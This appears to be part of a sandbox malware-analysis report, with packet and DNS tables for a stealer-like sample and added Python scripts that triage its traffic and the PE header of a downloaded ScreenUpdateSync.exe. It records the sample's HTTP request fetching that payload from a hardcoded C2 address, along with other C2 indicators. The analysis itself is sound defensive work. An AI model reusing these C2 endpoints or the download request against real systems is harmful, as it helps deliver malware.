                                                                                  Oct 26, 2024 18:58:20.057370901 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057384968 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057404995 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057418108 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057543039 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057554960 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057568073 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057576895 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057591915 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057609081 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057661057 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057674885 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057693005 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057698965 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057714939 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057729959 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204327106 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204339027 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204349041 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204350948 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204363108 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204369068 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204371929 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204375982 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204385996 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204397917 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204408884 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204431057 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204479933 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204490900 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204502106 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204508066 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204514027 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204521894 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204550028 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204555988 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204592943 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204665899 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204677105 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204688072 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204699039 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204701900 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204724073 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204725027 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204736948 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204742908 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.204751015 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204761982 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204772949 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204783916 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.204937935 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205024004 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.205037117 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205049038 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205061913 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205064058 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.205074072 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205080986 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.205085039 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205097914 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205102921 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.205110073 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205121994 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205132008 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205142021 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.205142975 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205178022 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.205195904 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.205238104 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205270052 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.205347061 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.205379963 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319603920 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319619894 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319641113 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319650888 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319663048 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319674969 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319705963 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319730043 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319760084 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319796085 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319801092 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319812059 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319839001 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319847107 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319854975 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319875956 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319885969 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319919109 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319921017 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319936037 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319967031 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319967031 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319982052 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.319983959 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.319993973 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320025921 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320043087 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320195913 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320209026 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320240021 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320242882 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320250988 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320271969 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320271969 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320283890 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320283890 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320295095 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320312023 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320318937 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320324898 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320338011 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320352077 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320373058 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320383072 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320393085 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320420027 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320477009 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320496082 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320516109 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320525885 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320528030 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320538998 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320549011 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320559025 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320590019 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320600033 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320637941 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320657969 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320669889 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320693970 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320702076 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320705891 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320710897 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320717096 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320730925 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320746899 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320760012 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320848942 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320888042 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320892096 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320899010 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320920944 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320928097 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320936918 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320940971 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.320964098 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.320981979 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321069002 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321080923 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321094036 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321118116 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321139097 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321352005 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321398020 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321400881 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321413040 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321425915 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.321432114 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.321505070 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:25.204703093 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:25.206496954 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:25.387622118 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:25.393187046 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:25.393249035 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:25.393450975 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:25.399065018 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:26.274070024 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:26.274171114 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:26.668085098 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:26.673666954 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:28.019727945 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:28.019793034 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:33.266067982 CEST804973262.204.41.177192.168.2.4
                                                                                  Oct 26, 2024 18:58:33.266150951 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 18:58:48.474795103 CEST4973280192.168.2.462.204.41.177
                                                                                  Oct 26, 2024 19:00:06.751259089 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:07.060772896 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:07.670155048 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:08.873297930 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:11.279546976 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:16.092078924 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 19:00:25.701447964 CEST4973180192.168.2.4176.113.115.37
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 26, 2024 18:58:16.762857914 CEST  62670        53         192.168.2.4      1.1.1.1
Oct 26, 2024 18:58:16.960917950 CEST  53           62670      1.1.1.1          192.168.2.4
Oct 26, 2024 18:58:33.396524906 CEST  53           54704      1.1.1.1          192.168.2.4
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class        DNS over HTTPS
Oct 26, 2024 18:58:16.762857914 CEST  192.168.2.4  1.1.1.1  0x45aa    Standard query (0)  post-to-me.com  A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name            CName  Address         Type            Class        DNS over HTTPS
Oct 26, 2024 18:58:16.960917950 CEST  1.1.1.1    192.168.2.4  0x45aa    No error (0)  post-to-me.com         104.21.56.70    A (IP address)  IN (0x0001)  false
Oct 26, 2024 18:58:16.960917950 CEST  1.1.1.1    192.168.2.4  0x45aa    No error (0)  post-to-me.com         172.67.179.207  A (IP address)  IN (0x0001)  false
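Two things in the packet and DNS tables above are worth pulling out mechanically rather than by eye. The only name the sample resolves is post-to-me.com, yet the HTTP peers 176.113.115.37 and 62.204.41.177 are contacted with no preceding lookup, which is what a hardcoded address in the malware configuration looks like on the wire (the report's "C2 URLs / IPs found in malware configuration" signature). And the seven client-only packets on source port 49731 at 19:00:06 to 19:00:25 arrive at roughly doubling intervals with nothing coming back from 176.113.115.37: that is the TCP stack retransmitting into a server that went silent, not the stealer beaconing. The script below is an added example and is not part of the Joe Sandbox report; it runs over a constructed excerpt of the rows shown above (the full tables contain many more packets), and its function names and heuristics are my own.

```python
"""Flow and DNS triage over the packet tables of this report.

Added example: this is not code from the Joe Sandbox report. The records
below are a constructed excerpt of the report's TCP, UDP and DNS rows (the
full tables have many more packets); function names and the heuristics
are my own.
"""

SANDBOX_HOST = "192.168.2.4"   # analysis VM address as it appears in the report
RESOLVER_PORT = 53             # flows to the resolver itself are not direct-to-IP C2

# Constructed excerpt of the packet rows: (time, src port, dst port, src IP, dst IP).
PACKETS = [
    ("18:58:16.762857914", 62670, 53, "192.168.2.4", "1.1.1.1"),
    ("18:58:16.960917950", 53, 62670, "1.1.1.1", "192.168.2.4"),
    ("18:58:20.204049110", 49731, 80, "192.168.2.4", "176.113.115.37"),
    ("18:58:20.204104900", 80, 49731, "176.113.115.37", "192.168.2.4"),
    ("18:58:25.204703093", 80, 49731, "176.113.115.37", "192.168.2.4"),
    ("18:58:25.387622118", 49732, 80, "192.168.2.4", "62.204.41.177"),
    ("18:58:25.393187046", 80, 49732, "62.204.41.177", "192.168.2.4"),
    ("18:58:48.474795103", 49732, 80, "192.168.2.4", "62.204.41.177"),
    ("19:00:06.751259089", 49731, 80, "192.168.2.4", "176.113.115.37"),
    ("19:00:07.060772896", 49731, 80, "192.168.2.4", "176.113.115.37"),
    ("19:00:07.670155048", 49731, 80, "192.168.2.4", "176.113.115.37"),
    ("19:00:08.873297930", 49731, 80, "192.168.2.4", "176.113.115.37"),
    ("19:00:11.279546976", 49731, 80, "192.168.2.4", "176.113.115.37"),
    ("19:00:16.092078924", 49731, 80, "192.168.2.4", "176.113.115.37"),
    ("19:00:25.701447964", 49731, 80, "192.168.2.4", "176.113.115.37"),
]

# Constructed excerpt of the DNS answer rows: (name, address).
DNS_ANSWERS = [
    ("post-to-me.com", "104.21.56.70"),
    ("post-to-me.com", "172.67.179.207"),
]


def to_seconds(hms):
    """'HH:MM:SS.fffffffff' -> seconds since midnight (all rows fall on one day)."""
    h, m, s = hms.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def summarize_flows(packets, host=SANDBOX_HOST):
    """Group packets into flows keyed by (remote IP, remote port, local port),
    counting packets per direction and collecting the 'unanswered tail': outbound
    packets sent after the peer's last packet (a client retransmitting into silence)."""
    flows = {}
    for ts, sport, dport, src, dst in packets:
        t = to_seconds(ts)
        outbound = src == host
        key = (dst, dport, sport) if outbound else (src, sport, dport)
        f = flows.setdefault(key, {"out": 0, "in": 0, "first": t, "last": t,
                                   "last_in": None, "out_times": []})
        f["first"], f["last"] = min(f["first"], t), max(f["last"], t)
        if outbound:
            f["out"] += 1
            f["out_times"].append(t)
        else:
            f["in"] += 1
            f["last_in"] = t if f["last_in"] is None else max(f["last_in"], t)
    for f in flows.values():
        cut = -1.0 if f["last_in"] is None else f["last_in"]
        f["unanswered_tail"] = sorted(t for t in f["out_times"] if t > cut)
    return flows


def unresolved_peers(flows, dns_answers):
    """Remote IPs contacted without ever appearing in a DNS answer (hardcoded
    addresses); the resolver itself (port 53) is skipped since it is never resolved."""
    resolved = {addr for _, addr in dns_answers}
    return {ip for ip, rport, _ in flows
            if rport != RESOLVER_PORT and ip not in resolved}


def unused_answers(flows, dns_answers):
    """Resolved addresses that no flow in the excerpt contacted."""
    contacted = {ip for ip, _, _ in flows}
    return {addr for _, addr in dns_answers if addr not in contacted}


def backoff_ratios(times):
    """Ratio of each inter-packet gap to the previous one. A run of ratios near
    2.0 is the kernel's TCP retransmission timer doubling, not a beacon interval."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    return [g2 / g1 for g1, g2 in zip(gaps, gaps[1:]) if g1 > 0]


if __name__ == "__main__":
    flows = summarize_flows(PACKETS)
    for (ip, rport, lport), f in sorted(flows.items()):
        print(f"{ip}:{rport} <-> :{lport}  out={f['out']} in={f['in']} "
              f"unanswered_tail={len(f['unanswered_tail'])}")
    print("direct-to-IP peers:", sorted(unresolved_peers(flows, DNS_ANSWERS)))
    print("resolved but not contacted:", sorted(unused_answers(flows, DNS_ANSWERS)))
    tail = flows[("176.113.115.37", 80, 49731)]["unanswered_tail"]
    print("retransmit gap ratios:", [round(r, 2) for r in backoff_ratios(tail)])
```

On this excerpt both HTTP peers come out as direct-to-IP, the two Cloudflare addresses returned for post-to-me.com are never contacted within the rows shown here, and the gap ratios for the 19:00 tail sit between 1.97 and 2.00, the signature of an exponential retransmission back-off. Whether the resolved addresses are contacted elsewhere in the capture can only be settled against the full table, not this slice.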
                                                                                  • post-to-me.com
                                                                                  • 176.113.115.37
                                                                                  • 62.204.41.177
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49731        176.113.115.37  80                7288  C:\Users\user\Desktop\jicQJ2cdlM.exe
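Session 0 is the sample process (PID 7288) fetching ScreenUpdateSync.exe from 176.113.115.37 over plaintext HTTP, as the HTTP stream that follows shows: the request carries the non-browser User-Agent "ShareScreen" and a bare IP in the Host header, and the server answers with Content-Type application/x-msdos-program and a body that opens with an MZ header. The script below is an added example, not code from the Joe Sandbox report. It reconstructs that exchange from the headers and the Data Raw prefix printed in the stream, flags the indicators a detection engineer would key on, and decodes the PE header fields that are already visible in the first 338 bytes (machine, section count, link timestamp, SizeOfImage). The finding names and the expansion threshold are my own heuristics, and the body is cut where the report prints [TRUNCATED], so file hashes cannot be reproduced from it.

```python
"""Triage of the ScreenUpdateSync.exe download in HTTP session 0.

Added example, not code from the Joe Sandbox report. REQUEST, RESPONSE_HEAD and
BODY_PREFIX are constructed from the headers and the Data Raw prefix printed in
the report's HTTP stream; the body stops where the report prints [TRUNCATED].
Finding names and the expansion threshold are my own heuristics.
"""
import ipaddress
import struct
from datetime import datetime, timezone

# Constructed sample: the client request as captured (the report counts 85 bytes).
REQUEST = (b"GET /ScreenUpdateSync.exe HTTP/1.1\r\n"
           b"User-Agent: ShareScreen\r\n"
           b"Host: 176.113.115.37\r\n\r\n")

# Constructed sample: the response head as captured.
RESPONSE_HEAD = (b"HTTP/1.1 200 OK\r\n"
                 b"Date: Sat, 26 Oct 2024 16:58:19 GMT\r\n"
                 b"Server: Apache/2.4.41 (Ubuntu)\r\n"
                 b"Last-Modified: Sat, 26 Oct 2024 16:45:02 GMT\r\n"
                 b'ETag: "62400-62563f4f86bc9"\r\n'
                 b"Accept-Ranges: bytes\r\n"
                 b"Content-Length: 402432\r\n"
                 b"Content-Type: application/x-msdos-program\r\n\r\n")

# Constructed sample: the first 338 body bytes, copied from the report's Data Raw dump.
BODY_PREFIX = bytes.fromhex(
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 "
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f "
    "74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 "
    "93 81 e6 bb d7 e0 88 e8 d7 e0 88 e8 d7 e0 88 e8 6a af 1e e8 d6 e0 88 e8 c9 b2 0c e8 ca e0 88 e8 "
    "c9 b2 1d e8 c3 e0 88 e8 c9 b2 0b e8 ba e0 88 e8 f0 26 f3 e8 d2 e0 88 e8 d7 e0 89 e8 ac e0 88 e8 "
    "c9 b2 02 e8 d6 e0 88 e8 c9 b2 1c e8 d6 e0 88 e8 c9 b2 19 e8 d6 e0 88 e8 52 69 63 68 d7 e0 88 e8 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "50 45 00 00 4c 01 05 00 3e fe b8 65 00 00 00 00 00 00 00 00 e0 00 03 01 "
    "0b 01 09 00 00 a4 03 00 00 d8 72 02 00 00 00 00 1e 17 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 "
    "00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 76 02 00 04 00 00 "
    "15 54")


def parse_http_head(raw):
    """Split an HTTP head into (start line, {lowercased header name: value})."""
    lines = raw.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.decode("ascii", "replace").partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].decode("ascii", "replace"), headers


def parse_pe_header(data):
    """Read the DOS, COFF and PE32 optional-header fields needed for triage."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    coff, opt = e_lfanew + 4, e_lfanew + 24        # COFF header, then optional header
    machine, nsections, stamp, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, coff)
    magic = struct.unpack_from("<H", data, opt)[0]
    size_of_code, size_of_init, _, entry = struct.unpack_from("<IIII", data, opt + 4)
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_image, size_of_headers = struct.unpack_from("<II", data, opt + 56)
    return {"machine": machine, "number_of_sections": nsections, "timestamp": stamp,
            "compile_time": datetime.fromtimestamp(stamp, tz=timezone.utc).isoformat(),
            "characteristics": chars, "magic": magic, "entry_point": entry,
            "image_base": image_base, "size_of_code": size_of_code,
            "size_of_initialized_data": size_of_init, "size_of_image": size_of_image,
            "size_of_headers": size_of_headers}


def triage_download(request, response_head, body, expand_ratio=4.0):
    """Return (set of finding codes, parsed PE fields or None) for one download."""
    findings = set()
    _, req = parse_http_head(request)
    if not req.get("user-agent", "").startswith("Mozilla/"):   # heuristic: no browser UA
        findings.add("non_browser_user_agent")
    host = req.get("host", "").rsplit(":", 1)[0]                # IPv4 literal or a name
    try:
        ipaddress.ip_address(host)
        findings.add("host_is_ip_literal")
    except ValueError:
        pass
    _, resp = parse_http_head(response_head)
    if resp.get("content-type", "").startswith("application/x-msdos-program"):
        findings.add("executable_content_type")
    pe = None
    if body.startswith(b"MZ"):
        findings.add("mz_body")
        pe = parse_pe_header(body)
        declared = int(resp.get("content-length", "0") or 0)
        # Heuristic: an in-memory image many times larger than the file on the wire
        # means large virtual-only sections, which is what unpacking stubs look like.
        if declared and pe["size_of_image"] / declared > expand_ratio:
            findings.add("image_expands_in_memory")
    return findings, pe


if __name__ == "__main__":
    found, fields = triage_download(REQUEST, RESPONSE_HEAD, BODY_PREFIX)
    print(sorted(found), {k: hex(v) if isinstance(v, int) else v for k, v in fields.items()})
```

Two consistency checks fall out of the parse. Apache's default ETag starts with the file size in hex, and 0x62400 is exactly the 402432 bytes in Content-Length. SizeOfImage decodes to 0x2767000 (about 41 MB) against a 402432-byte file, so most of the image is virtual-only space that gets filled at run time, in line with the report's "Detected unpacking" signatures; the link timestamp 0x65b8fe3e decodes to 2024-01-30 13:48:46 UTC, which is a header field and not evidence of when the payload was actually built.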
Timestamp                             Bytes transferred  Direction  Data
